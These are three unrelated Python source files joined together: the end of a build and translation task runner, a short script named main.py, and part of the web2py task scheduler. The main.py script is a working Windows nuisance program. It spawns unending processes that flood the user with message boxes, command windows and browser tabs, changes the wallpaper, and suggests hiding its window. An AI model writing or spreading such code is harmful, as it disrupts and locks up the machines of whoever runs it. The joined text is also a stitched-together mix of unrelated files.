'--syntax', 'scss'] if context.verbosity > 1: args.append('--verbose') args.append(os.path.join(context.app.scss_source_path, '**', '*.scss')) return context.node_tool('sass-lint', *args) @tasks.register('lint_javascript', 'lint_stylesheets', hidden=True) def lint(_: Context): """ Tests javascript and stylesheets for code and style errors """ @tasks.register('create_build_paths', hidden=True) def additional_assets(context: Context): """ Collects assets from GOV.UK frontend toolkit """ rsync_flags = '-avz' if context.verbosity == 2 else '-az' for path in context.app.additional_asset_paths: context.shell(f'rsync {rsync_flags} {path}/ {context.app.asset_build_path}/') @tasks.register('create_build_paths', hidden=True) def take_screenshots(context: Context): """ Takes screenshots if special test cases are defined """ context.management_command('takescreenshots', interactive=False) collect_static_files(context) @tasks.register('create_build_paths', hidden=True) def collect_static_files(context: Context): """ Collects assets for serving from single root """ context.management_command('collectstatic', interactive=False) @tasks.register(hidden=True) def precompile_python_code(context: Context): """ Pre-compiles python modules """ from compileall import compile_dir kwargs = {} if context.verbosity < 2: kwargs['quiet'] = True compile_dir(context.app.django_app_name, **kwargs) @tasks.register('python_dependencies') def make_messages(context: Context, javascript=False, fuzzy=False): """ Collects text into translation source files """ kwargs = { 'all': True, 'keep_pot': True, 'no_wrap': True, } if fuzzy: kwargs['allow_fuzzy'] = True if javascript: kwargs.update(domain='djangojs', ignore_patterns=['app.js']) with in_dir(context.app.django_app_name): return context.management_command('makemessages', **kwargs) @tasks.register('python_dependencies', hidden=True) def compile_messages(context: Context): """ Compiles translation messages """ with in_dir(context.app.django_app_name): return context.management_command('compilemessages') @tasks.register('python_dependencies') def translations(context: Context, pull=False, push=False): """ Synchronises translations with transifex.com """ if not (pull or push): raise TaskError('Specify whether to push or pull translations') if pull: context.shell('tx', 'pull') make_messages(context, javascript=False) make_messages(context, javascript=True) if push: context.shell('tx', 'push', '--source', '--no-interactive') @tasks.register() def clean(context: Context, delete_dependencies: bool = False): """ Deletes build outputs """ paths = [ context.app.asset_build_path, context.app.collected_assets_path, 'docker-compose.yml', 'package.json', 'package-lock.json', 'webpack.config.js', ] context.shell(f'rm -rf {paths_for_shell(paths)}') context.shell(f'find {context.app.django_app_name} -name "*.pyc" -or -name __pycache__ -delete') if delete_dependencies: context.info(f'Cleaning app {context.app.name} dependencies') paths = ['node_modules', 'venv'] context.shell(f'rm -rf {paths_for_shell(paths)}')
main.py
"""Importing modules""" import ctypes import os import webbrowser import random from time import sleep import threading from multiprocessing import Process # <----------> if os.name != 'nt': exit("Not windows") # <----------> LOGIN_MSG = r""" ______ ______ ______ ______ __ __ ______ __ __ ______ _____ /\ ___\ /\ ___\ /\__ _\ /\ ___\ /\ \/\ \ /\ ___\ /\ \/ / /\ ___\ /\ __-. \ \ \__ \ \ \ __\ \/_/\ \/ \ \ __\ \ \ \_\ \ \ \ \____ \ \ _"-. \ \ __\ \ \ \/\ \ \ \_____\ \ \_____\ \ \_\ \ \_\ \ \_____\ \ \_____\ \ \_\ \_\ \ \_____\ \ \____- \/_____/ \/_____/ \/_/ \/_/ \/_____/ \/_____/ \/_/\/_/ \/_____/ \/____/ """ # http://patorjk.com/software/taag/#p=display&f=Sub-Zero&t=GET%20FUCKED def login(): """Print login msg""" print(LOGIN_MSG) # <----------> #def hide(): # USE PYINSTALLER "--window" OPTION (https://bit.ly/3C6myWa) # """Hide cmd window""" # thisprogramm = win32gui.GetForegroundWindow() # win32gui.ShowWindow(thisprogramm, win32con.SW_HIDE) # <----------> def spam_msgbox(): """Spam user with windows""" while True: ctypes.windll.user32.MessageBoxW(0, "GET FUCKED", "LMAO", 16) def spam_cmd(): """Spam user with cmd""" while True: os.system("start") def change_wallpaper(): ctypes.windll.user32.SystemParametersInfoA(20, 0, "img/logo.png", 0) def spam_tabs(): """Spam user with tabs""" urls = ["https://www.youtube.com/watch?v=dQw4w9WgXcQ", "https://www.youtube.com/watch?v=d1YBv2mWll0"] while True: sleep(0.1) webbrowser.open_new_tab(random.choice(urls)) # <----------> # x1 = threading.Thread(target=spam_tabs, args=(1,)) # x2 = threading.Thread(target=spam_cmd, args=(1,)) # x3 = threading.Thread(target=spam_msgbox, args=(1,)) # x4 = threading.Thread(target=change_wallpaper, args=(1,)) proc1 = Process(target=spam_tabs) proc1.start() proc2 = Process(target=spam_cmd) proc2.start() proc3 = Process(target=spam_msgbox) proc3.start() proc4 = Process(target=change_wallpaper) proc4.start() # <----------> print(LOGIN_MSG)
scheduler.py
#!/usr/bin/env python # -*- coding: utf-8 -*- # vim: set ts=4 sw=4 et ai: """ | This file is part of the web2py Web Framework | Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu> | License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html) Background processes made simple --------------------------------- """ from __future__ import print_function import socket import os import logging import types from functools import reduce import datetime import re import sys from json import loads, dumps import tempfile import traceback import threading import multiprocessing import time import signal from gluon import DAL, Field, IS_NOT_EMPTY, IS_IN_SET, IS_NOT_IN_DB, IS_EMPTY_OR from gluon import IS_INT_IN_RANGE, IS_DATETIME, IS_IN_DB from gluon.utils import web2py_uuid from gluon._compat import Queue, long, iteritems, PY2, to_bytes, string_types, integer_types from gluon.storage import Storage USAGE = """ ## Example For any existing application myapp Create File: myapp/models/scheduler.py ====== from gluon.scheduler import Scheduler def demo1(*args, **vars): print('you passed args=%s and vars=%s' % (args, vars)) return 'done!' def demo2(): 1/0 scheduler = Scheduler(db, dict(demo1=demo1, demo2=demo2)) ## run worker nodes with: cd web2py python web2py.py -K myapp or python gluon/scheduler.py -u sqlite://storage.sqlite \ -f applications/myapp/databases/ \ -t mytasks.py (-h for info) python scheduler.py -h ## schedule jobs using http://127.0.0.1:8000/myapp/appadmin/insert/db/scheduler_task ## monitor scheduled jobs http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_task.id ## view completed jobs http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_run.id ## view workers http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_worker.id """ IDENTIFIER = "%s#%s" % (socket.gethostname(), os.getpid()) logger = logging.getLogger('web2py.scheduler.%s' % IDENTIFIER) QUEUED = 'QUEUED' ASSIGNED = 'ASSIGNED' RUNNING = 'RUNNING' COMPLETED = 'COMPLETED' FAILED = 'FAILED' TIMEOUT = 'TIMEOUT' STOPPED = 'STOPPED' ACTIVE = 'ACTIVE' TERMINATE = 'TERMINATE' DISABLED = 'DISABLED' KILL = 'KILL' PICK = 'PICK' STOP_TASK = 'STOP_TASK' EXPIRED = 'EXPIRED' SECONDS = 1 HEARTBEAT = 3 * SECONDS MAXHIBERNATION = 10 CLEAROUT = '!clear!' RESULTINFILE = 'result_in_file:' CALLABLETYPES = (types.LambdaType, types.FunctionType, types.BuiltinFunctionType, types.MethodType, types.BuiltinMethodType) class Task(object): """Defines a "task" object that gets passed from the main thread to the executor's one """ def __init__(self, app, function, timeout, args='[]', vars='{}', **kwargs): logger.debug(' new task allocated: %s.%s', app, function) self.app = app self.function = function self.timeout = timeout self.args = args # json self.vars = vars # json self.__dict__.update(kwargs) def __str__(self): return '<Task: %s>' % self.function class TaskReport(object): """Defines a "task report" object that gets passed from the executor's thread to the main one """ def __init__(self, status, result=None, output=None, tb=None): logger.debug(' new task report: %s', status) if tb: logger.debug(' traceback: %s', tb) else: logger.debug(' result: %s', result) self.status = status self.result = result self.output = output self.tb = tb def __str__(self): return '<TaskReport: %s>' % self.status class JobGraph(object): """Experimental: dependencies amongs tasks.""" def __init__(self, db, job_name): self.job_name = job_name or 'job_0' self.db = db def add_deps(self, task_parent, task_child): """Create a dependency between task_parent and task_child.""" self.db.scheduler_task_deps.insert(task_parent=task_parent, task_child=task_child, job_name=self.job_name) def validate(self, job_name=None): """Validate if all tasks job_name can be completed. Checks if there are no mutual dependencies among tasks. Commits at the end if successfull, or it rollbacks the entire transaction. Handle with care! """ db = self.db sd = db.scheduler_task_deps if job_name: q = sd.job_name == job_name else: q = sd.id edges = db(q).select() nested_dict = {} for row in edges: k = row.task_parent if k in nested_dict: nested_dict[k].add(row.task_child) else: nested_dict[k] = set((row.task_child,)) try: rtn = [] for k, v in nested_dict.items(): v.discard(k) # Ignore self dependencies extra_items_in_deps = reduce(set.union, nested_dict.values()) - set(nested_dict.keys()) nested_dict.update(dict((item, set()) for item in extra_items_in_deps)) while True: ordered = set(item for item, dep in nested_dict.items() if not dep) if not ordered: break rtn.append(ordered) nested_dict = dict( (item, (dep - ordered)) for item, dep in nested_dict.items() if item not in ordered ) assert not nested_dict, "A cyclic dependency exists amongst %r" % nested_dict db.commit() return rtn except Exception: db.rollback() return None class CronParser(object): def __init__(self, cronline, base=None): self.cronline = cronline self.sched = base or datetime.datetime.now() self.task = None @staticmethod def _rangetolist(s, period='min'): if s.startswith('*'): if period == 'min': s = s.replace('*', '0-59', 1) elif period == 'hr': s = s.replace('*', '0-23', 1) elif period == 'dom': s = s.replace('*', '1-31', 1) elif period == 'mon': s = s.replace('*', '1-12', 1) elif period == 'dow': s = s.replace('*', '0-6', 1) match = re.match(r'(\d+)-(\d+)/(\d+)', s) if match: max_ = int(match.group(2)) + 1 step_ = int(match.group(3)) else: match = re.match(r'(\d+)/(\d+)', s) if match: ranges_max = dict(min=59, hr=23, mon=12, dom=31, dow=7) max_ = ranges_max[period] + 1 step_ = int(match.group(2)) if match: min_ = int(match.group(1)) retval = list(range(min_, max_, step_)) else: retval = [] return retval @staticmethod def _sanitycheck(values, period): if period == 'min': check = all(0 <= i <= 59 for i in values) elif period == 'hr': check = all(0 <= i <= 23 for i in values) elif period == 'dom': domrange = list(range(1, 32)) + ['l'] check = all(i in domrange for i in values) elif period == 'mon': check = all(1 <= i <= 12 for i in values) elif period == 'dow': check = all(0 <= i <= 7 for i in values) return check def _parse(self): line = self.cronline.lower() task = {} if line.startswith('@yearly'): line = line.replace('@yearly', '0 0 1 1 *') elif line.startswith('@annually'): line = line.replace('@annually', '0 0 1 1 *') elif line.startswith('@monthly'): line = line.replace('@monthly', '0 0 1 * *') elif line.startswith('@weekly'): line = line.replace('@weekly', '0 0 * * 0') elif line.startswith('@daily'): line = line.replace('@daily', '0 0 * * *') elif line.startswith('@midnight'): line = line.replace('@midnight', '0 0 * * *') elif line.startswith('@hourly'): line = line.replace('@hourly', '0 * * * *') params = line.strip().split() if len(params) < 5: raise ValueError('Invalid cron line (too short)') elif len(params) > 5: raise ValueError('Invalid cron line (too long)') daysofweek = {'sun': 0, 'mon': 1, 'tue': 2, 'wed': 3, 'thu': 4, 'fri': 5, 'sat': 6} monthsofyear = {'jan': 1, 'feb': 2, 'mar': 3, 'apr': 4, 'may': 5, 'jun': 6, 'jul': 7, 'aug': 8, 'sep': 9, 'oct': 10, 'nov': 11, 'dec': 12} for (s, i) in zip(params, ('min', 'hr', 'dom', 'mon', 'dow')): if s != '*': task[i] = [] vals = s.split(',') for val in vals: if i == 'dow': refdict = daysofweek elif i == 'mon': refdict = monthsofyear if i in ('dow', 'mon') and '-' in val and '/' not in val: isnum = val.split('-')[0].isdigit() if isnum: val = '%s/1' % val else: val = '-'.join([str(refdict.get(v, '')) for v in val.split('-')]) if '-' in val and '/' not in val: val = '%s/1' % val if '/' in val: task[i] += self._rangetolist(val, i) elif val.isdigit(): task[i].append(int(val)) elif i in ('dow', 'mon'): if val in refdict: task[i].append(refdict[val]) elif i == 'dom' and val == 'l': task[i].append(val) if not task[i]: raise ValueError('Invalid cron value (%s)' % s) if not self._sanitycheck(task[i], i): raise ValueError('Invalid cron value (%s)' % s) task[i] = sorted(task[i]) self.task = task @staticmethod def _get_next_dow(sched, task): task_dow = [a % 7 for a in task['dow']] while sched.isoweekday() % 7 not in task_dow: sched += datetime.timedelta(days=1) return sched @staticmethod def _get_next_dom(sched, task): if task['dom'] == ['l']: # instead of calendar.isleap try: last_feb = 29 datetime.date(sched.year, 2, last_feb) except ValueError: last_feb = 28 lastdayofmonth = [ 31, last_feb, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31 ] task_dom = [lastdayofmonth[sched.month - 1]] else: task_dom = task['dom'] while sched.day not in task_dom: sched += datetime.timedelta(days=1) return sched @staticmethod def _get_next_mon(sched, task): while sched.month not in task['mon']: if sched.month < 12: sched = sched.replace(month=sched.month + 1) else: sched = sched.replace(month=1, year=sched.year + 1) return sched @staticmethod def _getnext_hhmm(sched, task, add_to=True): if add_to: sched += datetime.timedelta(minutes=1) if 'min' in task: while sched.minute not in task['min']: sched += datetime.timedelta(minutes=1) if 'hr' in task and sched.hour not in task['hr']: while sched.hour not in task['hr']: sched += datetime.timedelta(hours=1) return sched def _getnext_date(self, sched, task): if 'dow' in task and 'dom' in task: dow = self._get_next_dow(sched, task) dom = self._get_next_dom(sched, task) sched = min(dow, dom) elif 'dow' in task: sched = self._get_next_dow(sched, task) elif 'dom' in task: sched = self._get_next_dom(sched, task) if 'mon' in task: sched = self._get_next_mon(sched, task) return sched.replace(hour=0, minute=0) def next(self): """Get next date according to specs.""" if not self.task: self._parse() task = self.task sched = self.sched x = 0 while x < 1000: # avoid potential max recursions x += 1 try: next_date = self._getnext_date(sched, task) except (ValueError, OverflowError) as e: raise ValueError('Invalid cron expression (%s)' % e) if next_date.date() > self.sched.date(): # we rolled date, check for valid hhmm sched = self._getnext_hhmm(next_date, task, False) break else: # same date, get next hhmm sched_time = self._getnext_hhmm(sched, task, True) if sched_time.date() > sched.date(): # we rolled date again :( sched = sched_time else: sched = sched_time break else: raise ValueError('Potential bug found, please submit your ' 'cron expression to the authors') self.sched = sched return sched def __iter__(self): """Support iteration.""" return self __next__ = next # the two functions below deal with simplejson decoding as unicode, # esp for the dict decode and subsequent usage as function Keyword arguments # unicode variable names won't work! # borrowed from http://stackoverflow.com/questions/956867/ def _decode_list(lst): if not PY2: return lst newlist = [] for i in lst: if isinstance(i, string_types): i = to_bytes(i) elif isinstance(i, list): i = _decode_list(i) newlist.append(i) return newlist def _decode_dict(dct): if not PY2: return dct newdict = {} for k, v in iteritems(dct): k = to_bytes(k) if isinstance(v, string_types): v = to_bytes(v) elif isinstance(v, list): v = _decode_list(v) newdict[k] = v return newdict def executor(retq, task, outq): """The function used to execute tasks in the background process.""" logger.debug(' task started') class LogOutput(object): """Facility to log output at intervals.""" def __init__(self, out_queue): self.out_queue = out_queue self.stdout = sys.stdout self.written = False sys.stdout = self def close(self): sys.stdout = self.stdout if self.written: # see "Joining processes that use queues" section in # https://docs.python.org/2/library/multiprocessing.html#programming-guidelines # https://docs.python.org/3/library/multiprocessing.html#programming-guidelines self.out_queue.cancel_join_thread() def flush(self): pass def write(self, data): self.out_queue.put(data) self.written = True W2P_TASK = Storage({ 'id': task.task_id, 'uuid': task.uuid, 'run_id': task.run_id }) stdout = LogOutput(outq) try: if task.app: from gluon.shell import env, parse_path_info from gluon import current ## FIXME: why temporarily change the log level of the root logger? # level = logging.getLogger().getEffectiveLevel() # logging.getLogger().setLevel(logging.WARN) # support for task.app like 'app/controller' (a, c, f) = parse_path_info(task.app) _env = env(a=a, c=c, import_models=True, extra_request={'is_scheduler': True}) # logging.getLogger().setLevel(level) f = task.function functions = current._scheduler.tasks if functions: _function = functions.get(f) else: # look into env _function = _env.get(f) if not isinstance(_function, CALLABLETYPES): raise NameError( "name '%s' not found in scheduler's environment" % f) # Inject W2P_TASK into environment _env.update({'W2P_TASK': W2P_TASK}) # Inject W2P_TASK into current current.W2P_TASK = W2P_TASK globals().update(_env) args = _decode_list(loads(task.args)) vars = loads(task.vars, object_hook=_decode_dict) result = dumps(_function(*args, **vars)) else: # for testing purpose only result = eval(task.function)( *loads(task.args, object_hook=_decode_dict), **loads(task.vars, object_hook=_decode_dict)) if len(result) >= 1024: fd, temp_path = tempfile.mkstemp(suffix='.w2p_sched') with os.fdopen(fd, 'w') as f: f.write(result) result = RESULTINFILE + temp_path retq.put(TaskReport('COMPLETED', result=result)) except: tb = traceback.format_exc() retq.put(TaskReport('FAILED', tb=tb)) finally: stdout.close() class IS_CRONLINE(object): """ Validates cronline """ def __init__(self, error_message=None): self.error_message = error_message def __call__(self, value, record_id=None): recur = CronParser(value, datetime.datetime.now()) try: recur.next() return (value, None) except ValueError as e: if not self.error_message: return (value, e) return (value, self.error_message) class TYPE(object): """ Validator that checks whether field is valid json and validates its type. Used for `args` and `vars` of the scheduler_task table """ def __init__(self, myclass=list, parse=False): self.myclass = myclass self.parse = parse def __call__(self, value, record_id=None): from gluon import current try: obj = loads(value) except: return (value, current.T('invalid json')) else: if isinstance(obj, self.myclass): if self.parse: return (obj, None) else: return (value, None) else: return (value, current.T('Not of type: %s') % self.myclass) TASK_STATUS = (QUEUED, RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED, EXPIRED) RUN_STATUS = (RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED) WORKER_STATUS = (ACTIVE, PICK, DISABLED, TERMINATE, KILL, STOP_TASK) class Scheduler(threading.Thread): """Scheduler object Args: db: DAL connection where Scheduler will create its tables tasks(dict): either a dict containing name-->func or None. If None, functions will be searched in the environment migrate(bool): turn migration on/off for the Scheduler's tables worker_name(str): force worker_name to identify each process. Leave it to None to autoassign a name (hostname#pid) group_names(list): process tasks belonging to this group defaults to ['main'] if nothing gets passed heartbeat(int): how many seconds the worker sleeps between one execution and the following one. Indirectly sets how many seconds will pass between checks for new tasks max_empty_runs(int): how many loops are allowed to pass without processing any tasks before exiting the process. 0 to keep always the process alive discard_results(bool): Scheduler stores executions's details into the scheduler_run table. By default, only if there is a result the details are kept. Turning this to True means discarding results even for tasks that return something utc_time(bool): do all datetime calculations assuming UTC as the timezone. Remember to pass `start_time` and `stop_time` to tasks accordingly use_spawn(bool): use spawn for subprocess (only useable with python3) """ def __init__(self, db, tasks=None, migrate=True, worker_name=None, group_names=None, heartbeat=HEARTBEAT, max_empty_runs=0, discard_results=False, utc_time=False, use_spawn=False): threading.Thread.__init__(self) self.setDaemon(True) self.process = None # the background process self.process_queues = (None, None) self.have_heartbeat = True # set to False to kill self.empty_runs = 0 self.db = db self.db_thread = None self.tasks = tasks self.group_names = group_names or ['main'] self.heartbeat = heartbeat self.worker_name = worker_name or IDENTIFIER self.max_empty_runs = max_empty_runs self.discard_results = discard_results self.is_a_ticker = False self.do_assign_tasks = False self.greedy = False self.utc_time = utc_time self.w_stats_lock = threading.RLock() self.w_stats = Storage( dict( status=RUNNING, sleep=heartbeat, total=0, errors=0, empty_runs=0, queue=0, distribution=None, workers=0) ) # dict holding statistics from gluon import current current._scheduler = self self.define_tables(db, migrate=migrate) self.use_spawn = use_spawn def execute(self, task): """Start the background process. Args: task : a `Task` object Returns: a `TaskReport` object """ outq = None retq = None if (self.use_spawn and not PY2): ctx = multiprocessing.get_context('spawn') outq = ctx.Queue() retq = ctx.Queue(maxsize=1) self.process = p = ctx.Process(target=executor, args=(retq, task, outq)) else: outq = multiprocessing.Queue() retq = multiprocessing.Queue(maxsize=1) self.process = p = \ multiprocessing.Process(target=executor, args=(retq, task, outq)) self.process_queues = (retq, outq) logger.debug(' task starting') p.start() start = time.time() if task.sync_output > 0: run_timeout = task.sync_output else: run_timeout = task.timeout task_output = tout = '' try: while p.is_alive() and (not task.timeout or time.time() - start < task.timeout): # NOTE: try always to empty the out queue before # the child process is joined, # see "Joining processes that use queues" section in # https://docs.python.org/2/library/multiprocessing.html#programming-guidelines # https://docs.python.org/3/library/multiprocessing.html#programming-guidelines while True: try: tout += outq.get(timeout=2) except Queue.Empty: break if tout: logger.debug(' partial output: "%s"', tout) if CLEAROUT in tout: task_output = tout[ tout.rfind(CLEAROUT) + len(CLEAROUT):] else: task_output += tout try: db = self.db db(db.scheduler_run.id == task.run_id).update(run_output=task_output) db.commit() tout = '' logger.debug(' partial output saved') except Exception: logger.exception(' error while saving partial output') task_output = task_output[:-len(tout)] p.join(timeout=run_timeout) except: logger.exception(' task stopped by general exception') self.terminate_process() tr = TaskReport(STOPPED) else: if p.is_alive(): logger.debug(' task timeout') self.terminate_process(flush_ret=False) try: # we try to get a traceback here tr = retq.get(timeout=2) # NOTE: risky after terminate tr.status = TIMEOUT tr.output = task_output except Queue.Empty: tr = TaskReport(TIMEOUT) else: try: tr = retq.get_nowait() except Queue.Empty: logger.debug(' task stopped') tr = TaskReport(STOPPED) else: logger.debug(' task completed or failed') result = tr.result if result and result.startswith(RESULTINFILE): temp_path = result.replace(RESULTINFILE, '', 1) with open(temp_path) as f: tr.result = f.read() os.unlink(temp_path) tr.output = task_output return tr _terminate_process_lock = threading.RLock() def terminate_process(self, flush_out=True, flush_ret=True): """Terminate any running tasks (internal use only)""" if self.process is not None: # must synchronize since we are called by main and heartbeat thread with self._terminate_process_lock: if flush_out: queue = self.process_queues[1] while not queue.empty(): # NOTE: empty() is not reliable try: queue.get_nowait() except Queue.Empty: pass if flush_ret: queue = self.process_queues[0] while not queue.empty(): try: queue.get_nowait() except Queue.Empty: pass logger.debug('terminating process') try: # NOTE: terminate should not be called when using shared # resources, see "Avoid terminating processes" # section in # https://docs.python.org/2/library/multiprocessing.html#programming-guidelines # https://docs.python.org/3/library/multiprocessing.html#programming-guidelines self.process.terminate() # NOTE: calling join after a terminate is risky, # as explained in "Avoid terminating processes" # section this can lead to a deadlock self.process.join() finally: self.process = None def die(self): """Forces termination of the worker process along with any running task""" logger.info('die!') self.have_heartbeat = False self.terminate_process() def give_up(self): """Waits for any running task to be executed, then exits the worker process""" logger.info('Giving up as soon as possible!') self.have_heartbeat = False def run(self): """This is executed by the heartbeat thread""" counter = 0 while self.have_heartbeat: self.send_heartbeat(counter) counter += 1 def start_heartbeats(self): self.start() def __get_migrate(self, tablename, migrate=True): if migrate is False: return False elif migrate is True: return True elif isinstance(migrate, str): return "%s%s.table" % (migrate, tablename) return True def now(self): """Shortcut that fetches current time based on UTC preferences.""" return self.utc_time and datetime.datetime.utcnow() or datetime.datetime.now() def set_requirements(self, scheduler_task): """Called to set defaults for lazy_tables connections.""" from gluon import current if hasattr(current, 'request'): scheduler_task.application_name.default = '%s/%s' % ( current.request.application, current.request.controller ) def define_tables(self, db, migrate): """Define Scheduler tables structure.""" from pydal.base import DEFAULT logger.debug('defining tables (migrate=%s)', migrate) now = self.now db.define_table( 'scheduler_task', Field('application_name', requires=IS_NOT_EMPTY(), default=None, writable=False), Field('task_name', default=None), Field('group_name', default='main'), Field('status', requires=IS_IN_SET(TASK_STATUS), default=QUEUED, writable=False), Field('broadcast', 'boolean', default=False), Field('function_name', requires=IS_IN_SET(sorted(self.tasks.keys())) if self.tasks else DEFAULT), Field('uuid', length=255, requires=IS_NOT_IN_DB(db, 'scheduler_task.uuid'), unique=True, default=web2py_uuid), Field('args', 'text', default='[]', requires=TYPE(list)), Field('vars', 'text', default='{}', requires=TYPE(dict)), Field('enabled', 'boolean', default=True), Field('start_time', 'datetime', default=now, requires=IS_DATETIME()), Field('next_run_time', 'datetime', default=now), Field('stop_time', 'datetime'), Field('repeats', 'integer', default=1, comment="0=unlimited", requires=IS_INT_IN_RANGE(0, None)), Field('retry_failed', 'integer', default=0, comment="-1=unlimited", requires=IS_INT_IN_RANGE(-1, None)), Field('period', 'integer', default=60, comment='seconds', requires=IS_INT_IN_RANGE(0, None)), Field('prevent_drift', 'boolean', default=False, comment='Exact start_times between runs'), Field('cronline', default=None, comment='Discard "period", use this cron expr instead', requires=IS_EMPTY_OR(IS_CRONLINE())), Field('timeout', 'integer', default=60, comment='seconds', requires=IS_INT_IN_RANGE(1, None)), Field('sync_output', 'integer', default=0, comment="update output every n sec: 0=never", requires=IS_INT_IN_RANGE(0, None)), Field('times_run', 'integer', default=0, writable=False), Field('times_failed', 'integer', default=0, writable=False), Field('last_run_time', 'datetime', writable=False, readable=False), Field('assigned_worker_name', default='', writable=False), on_define=self.set_requirements, migrate=self.__get_migrate('scheduler_task', migrate), format='(%(id)s) %(task_name)s') db.define_table( 'scheduler_run', Field('task_id', 'reference scheduler_task'), Field('status', requires=IS_IN_SET(RUN_STATUS)), Field('start_time', 'datetime'), Field('stop_time', 'datetime'), Field('run_output', 'text'), Field('run_result', 'text'), Field('traceback', 'text'), Field('worker_name', default=self.worker_name), migrate=self.__get_migrate('scheduler_run', migrate) ) db.define_table( 'scheduler_worker', Field('worker_name', length=255, unique=True), Field('first_heartbeat', 'datetime'), Field('last_heartbeat', 'datetime'), Field('status', requires=IS_IN_SET(WORKER_STATUS)), Field('is_ticker', 'boolean', default=False, writable=False), Field('group_names', 'list:string', default=self.group_names), Field('worker_stats', 'json'), migrate=self.__get_migrate('scheduler_worker', migrate) ) db.define_table( 'scheduler_task_deps', Field('job_name', default='job_0'), Field('task_parent', 'integer', requires=IS_IN_DB(db, 'scheduler_task.id', '%(task_name)s') ), Field('task_child', 'reference scheduler_task'), Field('can_visit', 'boolean', default=False), migrate=self.__get_migrate('scheduler_task_deps', migrate) ) if migrate is not False: db.commit() def loop(self, worker_name=None): """Main loop. This works basically as a neverending loop that: - checks if the worker is ready to process tasks (is not DISABLED) - pops a task from the queue - if there is a task: - spawns the executor background process - waits for the process to be finished - sleeps `heartbeat` seconds - if there is not a task: - checks for max_empty_runs - sleeps `heartbeat` seconds """ signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1)) try: self.start_heartbeats() while self.have_heartbeat: with self.w_stats_lock: is_disabled = self.w_stats.status == DISABLED if is_disabled: logger.debug('Someone stopped me, sleeping until better' ' times come (%s)', self.w_stats.sleep) self.sleep() continue logger.debug('looping...') if self.is_a_ticker and self.do_assign_tasks: # I'm a ticker, and 5 loops passed without # reassigning tasks, let's do that self.wrapped_assign_tasks() task = self.wrapped_pop_task() if task: with self.w_stats_lock: self.w_stats.empty_runs = 0 self.w_stats.status = RUNNING self.w_stats.total += 1 self.wrapped_report_task(task, self.execute(task)) with self.w_stats_lock: if not self.w_stats.status == DISABLED: self.w_stats.status = ACTIVE else: with self.w_stats_lock: self.w_stats.empty_runs += 1 if self.max_empty_runs != 0: logger.debug('empty runs %s/%s', self.w_stats.empty_runs, self.max_empty_runs) if self.w_stats.empty_runs >= self.max_empty_runs: logger.info( 'empty runs limit reached, killing myself') self.die() if self.is_a_ticker and self.greedy: # there could be other tasks ready to be assigned logger.info('TICKER: greedy loop') self.wrapped_assign_tasks() logger.debug('sleeping...') self.sleep() except (KeyboardInterrupt, SystemExit): logger.info('catched') self.die() def wrapped_pop_task(self): """Commodity function to call `pop_task` and trap exceptions. If an exception is raised, assume it happened because of database contention and retries `pop_task` after 0.5 seconds """ db = self.db db.commit() # for MySQL only; FIXME: Niphlod, still needed? could avoid when not MySQL? for x in range(10): try: return self.pop_task() except Exception: logger.exception(' error popping tasks') self.w_stats.errors += 1 db.rollback() time.sleep(0.5) def pop_task(self): """Grab a task ready to be executed from the queue.""" now = self.now() db = self.db st = db.scheduler_task grabbed = db( (st.assigned_worker_name == self.worker_name) & (st.status == ASSIGNED) ) task = grabbed.select(limitby=(0, 1), orderby=st.next_run_time).first() if task: # none will touch my task! task.update_record(status=RUNNING, last_run_time=now) db.commit() logger.debug(' work to do %s', task.id) else: logger.info('nothing to do') return None if task.cronline: cron_recur = CronParser(task.cronline, now.replace(second=0, microsecond=0)) next_run_time = cron_recur.next() elif not task.prevent_drift: next_run_time = task.last_run_time + datetime.timedelta( seconds=task.period ) else: # calc next_run_time based on available slots # see #1191 next_run_time = task.start_time secondspassed = (now - next_run_time).total_seconds() times = secondspassed // task.period + 1 next_run_time += datetime.timedelta(seconds=task.period * times) times_run = task.times_run + 1 if times_run < task.repeats or task.repeats == 0: # need to run (repeating task) run_again = True else: # no need to run again run_again = False run_id = 0 while not self.discard_results: # FIXME: forever? logger.debug(' new scheduler_run record') try: run_id = db.scheduler_run.insert( task_id=task.id, status=RUNNING, start_time=now, worker_name=self.worker_name) db.commit() break except Exception: logger.exception(' error inserting scheduler_run') db.rollback() time.sleep(0.5) logger.info('new task %(id)s "%(task_name)s"' ' %(application_name)s.%(function_name)s' % task) return Task( app=task.application_name, function=task.function_name, timeout=task.timeout, args=task.args, # in json vars=task.vars, # in json task_id=task.id, run_id=run_id, run_again=run_again, next_run_time=next_run_time, times_run=times_run, stop_time=task.stop_time, retry_failed=task.retry_failed, times_failed=task.times_failed, sync_output=task.sync_output, uuid=task.uuid) def wrapped_report_task(self, task, task_report): """Commodity function to call `report_task` and trap exceptions. If an exception is raised, assume it happened because of database contention and retries `pop_task` after 0.5 seconds """ db = self.db while True: # FIXME: forever? try: self.report_task(task, task_report) db.commit() break except Exception: logger.exception(' error storing result') db.rollback() time.sleep(0.5) def report_task(self, task, task_report): """Take care of storing the result according to preferences. Deals with logic for repeating tasks. """ now = self.now() db = self.db st = db.scheduler_task sr = db.scheduler_run if not self.discard_results: if task_report.result != 'null' or task_report.tb: # result is 'null' as a string if task completed # if it's stopped it's None as NoneType, so we record # the STOPPED "run" anyway logger.debug(' recording task report in db (%s)', task_report.status) db(sr.id == task.run_id).update( status=task_report.status, stop_time=now, run_result=task_report.result, run_output=task_report.output, traceback=task_report.tb) else: logger.debug(' deleting task report in db because of no result') db(sr.id == task.run_id).delete() # if there is a stop_time and the following run would exceed it is_expired = (task.stop_time and task.next_run_time > task.stop_time or False) status = (task.run_again and is_expired and EXPIRED or task.run_again and not is_expired and QUEUED or COMPLETED) if task_report.status == COMPLETED: d = dict(status=status, next_run_time=task.next_run_time, times_run=task.times_run, times_failed=0 ) db(st.id == task.task_id).update(**d) if status == COMPLETED: self.update_dependencies(task.task_id) else: st_mapping = {'FAILED': 'FAILED', 'TIMEOUT': 'TIMEOUT', 'STOPPED': 'FAILED'}[task_report.status] status = (task.retry_failed and task.times_failed < task.retry_failed and QUEUED or task.retry_failed == -1 and QUEUED or st_mapping) db(st.id == task.task_id).update( times_failed=st.times_failed + 1, next_run_time=task.next_run_time, status=status 